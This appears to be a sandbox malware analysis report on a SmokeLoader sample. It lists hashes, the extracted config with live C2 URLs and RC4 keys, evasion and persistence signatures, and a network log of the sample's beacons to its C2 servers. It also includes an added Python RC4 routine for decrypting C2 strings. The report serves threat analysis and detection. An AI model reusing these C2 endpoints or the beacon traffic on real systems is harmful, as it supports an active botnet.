Resubmissions

07/01/2024, 18:26 UTC

240107-w3ameabffn (score 10)

Analysis

  • max time kernel
    102s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07/01/2024, 18:26 UTC

General

  • Target

    Samples 6/ca181f57edb3d99fbdfd1a512a783d266d479c2fd38ffea14742771df7ba2c1a.exe

  • Size

    248KB

  • MD5

    14c45fa75b1f8644c5fe37ca234a456b

  • SHA1

    056713d15dfa8032597aac2e3f61e6a5794a53e8

  • SHA256

    ca181f57edb3d99fbdfd1a512a783d266d479c2fd38ffea14742771df7ba2c1a

  • SHA512

    b6f212cbb3255c2da4d1935507c5f83833bbeea3b6aca7c0632852db2018dc1a667756b8693a50793cc1ea75296fc13b60eea8c0b645a9e7c901a69a6adbbc21

  • SSDEEP

    3072:A9orP+stnvfG4+zxvGz/QUVcRe/1nkJuTby/cT2cARxVC09++zu:SoCshG4qx1UVco/1aYySAR+

Malware Config

Extracted

  • Family
    smokeloader
  • Botnet
    pub4

Extracted

  • Family
    smokeloader
  • Version
    2022
  • C2
    http://dpav.cc/tmp/
    http://lrproduct.ru/tmp/
    http://kggcp.com/tmp/
    http://talesofpirates.net/tmp/
    http://pirateking.online/tmp/
    http://piratia.pw/tmp/
    http://go-piratia.ru/tmp/
  • rc4.i32
    1 0x3b22e540
  • rc4.i32
    1 0xa6b397e0
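The two rc4.i32 values are, according to public analyses of SmokeLoader 2022, 4-byte RC4 keys that protect the C2 URLs and the bot's request and response bodies; this page only lists them. What follows is an added example, not code from the report or from Triage, showing how such a key is applied: a plain RC4 routine keyed with the DWORD's bytes, tried in both byte orders because the dump does not say which order the sample uses (the byte order is an assumption), to recover a C2 string from an encrypted blob. The blob is constructed inline by encrypting the first C2 URL so the example runs offline; against a real sample you would feed it the encrypted strings pulled from the memory dumps listed under Downloads.

```python
"""Added example (not part of the Triage report): RC4 keyed with the 32-bit
rc4.i32 values from the extracted config, used to recover a C2 string.

Assumptions, labelled as such: the key is the 4 bytes of the DWORD, and both
byte orders are tried because the report does not state which one applies.
"""
import struct

RC4_KEYS = [0x3B22E540, 0xA6B397E0]          # rc4.i32 values from the report
C2_URLS = [                                   # C2 list from the report
    "http://dpav.cc/tmp/",
    "http://lrproduct.ru/tmp/",
    "http://kggcp.com/tmp/",
    "http://talesofpirates.net/tmp/",
    "http://pirateking.online/tmp/",
    "http://piratia.pw/tmp/",
    "http://go-piratia.ru/tmp/",
]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def dword_key(value: int, order: str = "little") -> bytes:
    """Turn an rc4.i32 value into its 4-byte key (byte order is an assumption)."""
    return struct.pack("<I" if order == "little" else ">I", value)


def looks_like_url(blob: bytes) -> bool:
    """Cheap plausibility check for a decrypted C2 string."""
    return blob.startswith((b"http://", b"https://")) and all(0x20 <= b < 0x7F for b in blob)


def recover_c2(ciphertext: bytes, candidates=RC4_KEYS):
    """Try every candidate key in both byte orders.

    Returns (key, byte order, url) for the first decryption that reads as a
    URL, or None. This is the step you run over an RC4-protected string
    carved from a memory dump when the key's byte order is unknown.
    """
    for value in candidates:
        for order in ("little", "big"):
            plain = rc4(dword_key(value, order), ciphertext)
            if looks_like_url(plain):
                return value, order, plain.decode("ascii")
    return None


def demo():
    # Constructed ciphertext: the first C2 URL encrypted under the first key,
    # little-endian. A real sample carries such blobs in its config; this one
    # is built here so the example runs offline.
    blob = rc4(dword_key(RC4_KEYS[0]), C2_URLS[0].encode())
    return recover_c2(blob)


if __name__ == "__main__":
    print(demo())
```

Before trusting any recovered string, check the routine against the standard RC4 test vector (key "Key", plaintext "Plaintext" gives ciphertext bbf316e8d940af0ad3); an implementation that fails it will produce plausible-looking garbage for every key.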

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Deletes itself 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Samples 6\ca181f57edb3d99fbdfd1a512a783d266d479c2fd38ffea14742771df7ba2c1a.exe
    "C:\Users\Admin\AppData\Local\Temp\Samples 6\ca181f57edb3d99fbdfd1a512a783d266d479c2fd38ffea14742771df7ba2c1a.exe"
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4216

Network

  • flag-us
    DNS
    19.177.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.177.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    19.177.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.177.190.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    146.78.124.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    146.78.124.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    194.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.178.17.96.in-addr.arpa
    IN PTR
    Response
    194.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-194.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    194.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.178.17.96.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.154.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.154.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    103.169.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    103.169.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    75.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    75.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    75.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    75.159.190.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    75.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    75.159.190.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    59.128.231.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    59.128.231.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    dpav.cc
    Remote address:
    8.8.8.8:53
    Request
    dpav.cc
    IN A
    Response
    dpav.cc
    IN A
    211.181.24.133
    dpav.cc
    IN A
    123.140.161.243
    dpav.cc
    IN A
    175.120.254.9
    dpav.cc
    IN A
    211.171.233.129
    dpav.cc
    IN A
    180.94.156.61
    dpav.cc
    IN A
    189.232.1.60
    dpav.cc
    IN A
    190.224.203.37
    dpav.cc
    IN A
    175.126.109.15
    dpav.cc
    IN A
    109.175.29.39
    dpav.cc
    IN A
    186.13.17.220
  • flag-kr
    POST
    http://dpav.cc/tmp/
    Remote address:
    211.181.24.133:80
    Request
    POST /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://jwatyipdwmeik.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 226
    Host: dpav.cc
  • flag-us
    DNS
    11.2.37.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.2.37.23.in-addr.arpa
    IN PTR
    Response
    11.2.37.23.in-addr.arpa
    IN PTR
    a23-37-2-11.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    lrproduct.ru
    Remote address:
    8.8.8.8:53
    Request
    lrproduct.ru
    IN A
    Response
  • flag-us
    DNS
    lrproduct.ru
    Remote address:
    8.8.8.8:53
    Request
    lrproduct.ru
    IN A
    Response
  • flag-us
    DNS
    133.24.181.211.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.24.181.211.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    kggcp.com
    Remote address:
    8.8.8.8:53
    Request
    kggcp.com
    IN A
    Response
  • flag-us
    DNS
    talesofpirates.net
    Remote address:
    8.8.8.8:53
    Request
    talesofpirates.net
    IN A
    Response
    talesofpirates.net
    IN A
    104.21.1.180
    talesofpirates.net
    IN A
    172.67.129.176
  • flag-us
    POST
    http://talesofpirates.net/tmp/
    Remote address:
    104.21.1.180:80
    Request
    POST /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://sohxfuborahxc.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 137
    Host: talesofpirates.net
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 07 Jan 2024 18:34:11 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 07 Jan 2024 19:34:11 GMT
    Location: https://talesofpirates.net/tmp/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3qikrhStPhb4jdXXmJUSTg9On7He3waaK0Ww6FCsHh%2F%2BU8SDS6WkB0YoYjhrj36Ck7blCYjUBD%2F9cMQkXCMtqd9VptGG3SWVZbAXEH8NeERKglnmqE8WjeS1M08rjoCr4S9UDVg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 841e4b2089b3731b-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://talesofpirates.net/tmp/
    Remote address:
    104.21.1.180:443
    Request
    GET /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Referer: http://sohxfuborahxc.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: talesofpirates.net
    Response
    HTTP/1.1 200 OK
    Date: Sun, 07 Jan 2024 18:34:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Set-Cookie: PHPSESSID=ug4q4d6cc8ttmdcaotatusrl8j; path=/
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VJ2MppETchxq1cYixgnRITA4xBM6vIPw6GqSLh%2BzIlGSeJWXtCcJKhPGk801BlZ5a7pDuoyg%2B7ON9XeM01N1CinIzY7Fq8rIs9rmbDAA%2FZksXs0YmI9oH4YrFWVveAU1NDL1bKw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 841e4b4dc83d63e7-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    180.1.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.1.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    180.1.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.1.21.104.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    232.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.135.221.88.in-addr.arpa
    IN PTR
    Response
    232.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-232.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    150.1.37.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    150.1.37.23.in-addr.arpa
    IN PTR
    Response
    150.1.37.23.in-addr.arpa
    IN PTR
    a23-37-1-150.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    pirateking.online
    Remote address:
    8.8.8.8:53
    Request
    pirateking.online
    IN A
    Response
    pirateking.online
    IN A
    172.67.180.11
    pirateking.online
    IN A
    104.21.96.118
  • flag-us
    DNS
    pirateking.online
    Remote address:
    8.8.8.8:53
    Request
    pirateking.online
    IN A
  • flag-us
    POST
    http://pirateking.online/tmp/
    Remote address:
    172.67.180.11:80
    Request
    POST /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://pvasducwsnbk.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 141
    Host: pirateking.online
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 07 Jan 2024 18:34:20 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 07 Jan 2024 19:34:20 GMT
    Location: https://pirateking.online/tmp/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IXBIHSRHfXFDdBUnrCwYpKkSUBdWL410VWodhKWUHTy95z24nx3azzZNZJq6Ur%2FZs64pR%2BCyFvtCQowLbcKc4xyThau8WvhbtnuiD1OXjMUUpFBWWvbJFdoflm9xD0CCzgt6zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 841e4b567cdb79ba-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://pirateking.online/tmp/
    Remote address:
    172.67.180.11:443
    Request
    GET /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Referer: http://pvasducwsnbk.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: pirateking.online
    Response
    HTTP/1.1 520
    Date: Sun, 07 Jan 2024 18:34:21 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: keep-alive
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nIIFjTlFsAb3f5M6KQ9Ef48iIvWnQDEn%2FCzNeYwALRXb3v1y2E65qR3qywdfUkbjMAupOZjWs4vWxFWS9hJhWss1oCMWAZIPftluQ6OrFLiegekD7vMDdj4IFaQtiRum1dvUTw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=2592000; includeSubDomains
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 841e4b57cb0c7755-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    piratia.pw
    Remote address:
    8.8.8.8:53
    Request
    piratia.pw
    IN A
    Response
    piratia.pw
    IN A
    104.21.79.117
    piratia.pw
    IN A
    172.67.170.133
  • flag-us
    POST
    http://piratia.pw/tmp/
    Remote address:
    104.21.79.117:80
    Request
    POST /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://hdyfoqbyrdss.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 237
    Host: piratia.pw
  • flag-us
    DNS
    11.180.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.180.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    117.79.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    117.79.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    117.79.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    117.79.21.104.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    go-piratia.ru
    Remote address:
    8.8.8.8:53
    Request
    go-piratia.ru
    IN A
    Response
    go-piratia.ru
    IN A
    104.21.51.101
    go-piratia.ru
    IN A
    172.67.179.5
  • flag-us
    POST
    http://go-piratia.ru/tmp/
    Remote address:
    104.21.51.101:80
    Request
    POST /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://lswmwcurwnk.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 238
    Host: go-piratia.ru
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 07 Jan 2024 18:34:25 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 07 Jan 2024 19:34:25 GMT
    Location: https://go-piratia.ru/tmp/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJ7BOmdERqDD26AEu6cTNek58pb9WDsY7gjYj7OjATKdeJ2yBemlP3O%2FfnpJwVEkq34YUKaQTyLTqVgWjNNxtjPNJjrY1ggdKiznI8OOkK9sQ4KlguET3VgXqDvcGHLT"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 841e4b74b9b63859-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://go-piratia.ru/tmp/
    Remote address:
    104.21.51.101:443
    Request
    GET /tmp/ HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Referer: http://lswmwcurwnk.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: go-piratia.ru
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 07 Jan 2024 18:34:27 GMT
    Content-Type: text/html;charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/8.0.30
    X-IPS-LoggedIn: 0
    Vary: Cookie,Accept-Encoding
    X-XSS-Protection: 0
    X-Frame-Options: sameorigin
    Content-Security-Policy: frame-ancestors 'self'
    X-Content-Security-Policy: frame-ancestors 'self'
    Referrer-Policy: strict-origin-when-cross-origin
    Expires: Sun, 07 Jan 2024 18:49:27 GMT
    Cache-Control: no-cache="Set-Cookie", max-age=900, public, s-maxage=900, stale-while-revalidate, stale-if-error
    Set-Cookie: ips4_IPSSessionFront=7eb3b1231b1937499caf55a2a4be7091; path=/; secure; HttpOnly
    Set-Cookie: ips4_chatbox_inRoom=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; secure; HttpOnly
    Last-Modified: Sun, 07 Jan 2024 18:34:27 GMT
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nF2Uclhh08%2FyjydiRTWZmwltm68ePLqI11V7Bi%2Ff0Jo%2BBqrz0xCW8slXrls%2Bmy2FXeRxbVC%2FnrXVXG81ste1bt2JQMWLz%2BMbYm%2B2INDKYDmvOJxXq1Fq1T1W3C%2F3jglC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 841e4b7e48086358-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    101.51.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    101.51.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    186.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    186.178.17.96.in-addr.arpa
    IN PTR
    Response
    186.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-186.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    205.47.74.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.47.74.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    100.5.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    100.5.17.2.in-addr.arpa
    IN PTR
    Response
    100.5.17.2.in-addr.arpa
    IN PTR
    a2-17-5-100.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    100.5.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    100.5.17.2.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    119.110.54.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    119.110.54.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    30.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    30.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.134.221.88.in-addr.arpa
    IN PTR
    Response
    18.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-18.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    187.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    187.178.17.96.in-addr.arpa
    IN PTR
    Response
    187.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-187.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    80.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    80.135.221.88.in-addr.arpa
    IN PTR
    Response
    80.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-80.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    80.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    80.135.221.88.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    0.204.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.204.248.87.in-addr.arpa
    IN PTR
    Response
    0.204.248.87.in-addr.arpa
    IN PTR
    https-87-248-204-0.lhr.llnw.net
  • flag-us
    DNS
    0.204.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.204.248.87.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    Remote address:
    8.8.8.8:53
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    DNS
    79.121.231.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.121.231.20.in-addr.arpa
    IN PTR
    Response
  • 138.91.171.81:80
    52 B
    1
  • 211.181.24.133:80
    http://dpav.cc/tmp/
    http
    765 B
    172 B
    6
    4

    HTTP Request

    POST http://dpav.cc/tmp/
  • 104.21.1.180:80
    http://talesofpirates.net/tmp/
    http
    733 B
    861 B
    7
    5

    HTTP Request

    POST http://talesofpirates.net/tmp/

    HTTP Response

    301
  • 104.21.1.180:443
    https://talesofpirates.net/tmp/
    tls, http
    1.7kB
    11.6kB
    17
    17

    HTTP Request

    GET https://talesofpirates.net/tmp/

    HTTP Response

    200
  • 172.67.180.11:80
    http://pirateking.online/tmp/
    http
    735 B
    860 B
    7
    5

    HTTP Request

    POST http://pirateking.online/tmp/

    HTTP Response

    301
  • 172.67.180.11:443
    https://pirateking.online/tmp/
    tls, http
    961 B
    6.2kB
    10
    9

    HTTP Request

    GET https://pirateking.online/tmp/

    HTTP Response

    520
  • 104.21.79.117:80
    http://piratia.pw/tmp/
    http
    1.3kB
    144 B
    7
    3

    HTTP Request

    POST http://piratia.pw/tmp/
  • 104.21.51.101:80
    http://go-piratia.ru/tmp/
    http
    931 B
    2.2kB
    9
    7

    HTTP Request

    POST http://go-piratia.ru/tmp/

    HTTP Response

    301
  • 104.21.51.101:443
    https://go-piratia.ru/tmp/
    tls, http
    1.7kB
    38.1kB
    25
    35

    HTTP Request

    GET https://go-piratia.ru/tmp/

    HTTP Response

    404
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls
    29.1kB
    856.6kB
    615
    619
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls
    615 B
    7.6kB
    9
    8
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls
    615 B
    7.6kB
    9
    8
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls
    615 B
    7.6kB
    9
    8
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls
    615 B
    7.6kB
    9
    8
  • 8.8.8.8:53
    19.177.190.20.in-addr.arpa
    dns
    144 B
    158 B
    2
    1

    DNS Request

    19.177.190.20.in-addr.arpa

    DNS Request

    19.177.190.20.in-addr.arpa

  • 8.8.8.8:53
    146.78.124.51.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    146.78.124.51.in-addr.arpa

  • 8.8.8.8:53
    194.178.17.96.in-addr.arpa
    dns
    144 B
    137 B
    2
    1

    DNS Request

    194.178.17.96.in-addr.arpa

    DNS Request

    194.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    241.154.82.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.154.82.20.in-addr.arpa

  • 8.8.8.8:53
    103.169.127.40.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    103.169.127.40.in-addr.arpa

  • 8.8.8.8:53
    75.159.190.20.in-addr.arpa
    dns
    216 B
    158 B
    3
    1

    DNS Request

    75.159.190.20.in-addr.arpa

    DNS Request

    75.159.190.20.in-addr.arpa

    DNS Request

    75.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    59.128.231.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    59.128.231.4.in-addr.arpa

  • 8.8.8.8:53
    dpav.cc
    dns
    53 B
    213 B
    1
    1

    DNS Request

    dpav.cc

    DNS Response

    211.181.24.133
    123.140.161.243
    175.120.254.9
    211.171.233.129
    180.94.156.61
    189.232.1.60
    190.224.203.37
    175.126.109.15
    109.175.29.39
    186.13.17.220

  • 8.8.8.8:53
    11.2.37.23.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    11.2.37.23.in-addr.arpa

  • 8.8.8.8:53
    lrproduct.ru
    dns
    116 B
    116 B
    2
    2

    DNS Request

    lrproduct.ru

    DNS Request

    lrproduct.ru

  • 8.8.8.8:53
    133.24.181.211.in-addr.arpa
    dns
    73 B
    142 B
    1
    1

    DNS Request

    133.24.181.211.in-addr.arpa

  • 8.8.8.8:53
    kggcp.com
    dns
    55 B
    55 B
    1
    1

    DNS Request

    kggcp.com

  • 8.8.8.8:53
    talesofpirates.net
    dns
    64 B
    96 B
    1
    1

    DNS Request

    talesofpirates.net

    DNS Response

    104.21.1.180
    172.67.129.176

  • 8.8.8.8:53
    180.1.21.104.in-addr.arpa
    dns
    142 B
    133 B
    2
    1

    DNS Request

    180.1.21.104.in-addr.arpa

    DNS Request

    180.1.21.104.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    232.135.221.88.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    232.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    150.1.37.23.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    150.1.37.23.in-addr.arpa

  • 8.8.8.8:53
    pirateking.online
    dns
    126 B
    95 B
    2
    1

    DNS Request

    pirateking.online

    DNS Request

    pirateking.online

    DNS Response

    172.67.180.11
    104.21.96.118

  • 8.8.8.8:53
    piratia.pw
    dns
    56 B
    88 B
    1
    1

    DNS Request

    piratia.pw

    DNS Response

    104.21.79.117
    172.67.170.133

  • 8.8.8.8:53
    11.180.67.172.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    11.180.67.172.in-addr.arpa

  • 8.8.8.8:53
    117.79.21.104.in-addr.arpa
    dns
    144 B
    134 B
    2
    1

    DNS Request

    117.79.21.104.in-addr.arpa

    DNS Request

    117.79.21.104.in-addr.arpa

  • 8.8.8.8:53
    go-piratia.ru
    dns
    59 B
    91 B
    1
    1

    DNS Request

    go-piratia.ru

    DNS Response

    104.21.51.101
    172.67.179.5

